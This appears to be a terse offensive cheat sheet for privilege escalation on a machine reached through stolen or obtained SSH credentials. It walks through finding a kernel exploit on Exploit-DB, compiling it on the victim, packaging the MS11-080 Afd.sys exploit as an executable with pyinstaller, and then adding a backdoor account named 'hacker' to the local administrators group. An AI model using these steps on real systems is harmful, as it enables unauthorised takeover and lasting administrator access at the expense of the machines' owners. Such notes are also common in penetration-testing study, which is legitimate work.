You have ssh credentials for a user and want to use machine to pivot but you do not have root privileges
- Check kernel version
- look under exploit db
download exploit to victim machine and compile
MS11-080 Afd.sys python script
python pyinstaller.py --onefile ms11-080.py
- to convert to exe
net user hacker hacker /add
net localgroup administrators hacker /add